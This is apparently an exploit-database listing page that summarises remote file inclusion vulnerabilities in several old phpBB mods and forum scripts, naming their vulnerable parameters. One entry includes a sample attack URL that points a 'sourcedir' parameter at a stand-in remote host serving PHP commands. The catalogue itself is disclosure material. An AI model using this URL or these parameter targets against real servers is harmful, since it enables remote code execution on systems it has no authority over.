header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

phpBBFM version 206-3-3 Remote File Include Vulnerability

A remote file include vulnerability exists in phpBBFM version 206-3-3. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL in the 'includes/functions.php?phpbb_root_path' parameter.

phpBurningPortal quiz-modul-1.0.1 – Remote File Include Exploit

This exploit allows an attacker to execute arbitrary code on the vulnerable server by including a remote file. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'lang_path' parameter in the 'quest_delete.php', 'quest_edit.php' and 'quest_news.php' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the 'lang_path' parameter.

Remote file include vuln found by sZ

A Remote File Inclusion (RFI) vulnerability was found in Supermod 3.0 for yabb. The vulnerable files are Offline.php, Sources/Admin.php, Sources/Offline.php and content/portalshow.php. The vulnerable code in each file is an include statement that does not include the settings.php file. An example exploit URL is http://site.com/community/Offline.php?sourcedir=http://shellurl.com/phpcommands.txt?

phpBB Security <= 1.0.1 Remote File Include Vulnerability

A remote file include vulnerability exists in phpBB Security <= 1.0.1. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system. This can be exploited by sending a specially crafted HTTP request containing a malicious URL to the vulnerable script.

phpBB ACP User Registration (MMW) Mod 1.00 File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'phpbb_root_path' parameter to 'includes/functions_mod_user.php' script. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.

pbpbb archive for search engines Remote File Include Vulnerability

pbpbb archive for search engines is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary script code in the context of the webserver process. This may facilitate unauthorized access; other attacks are also possible.

Recent Exploits: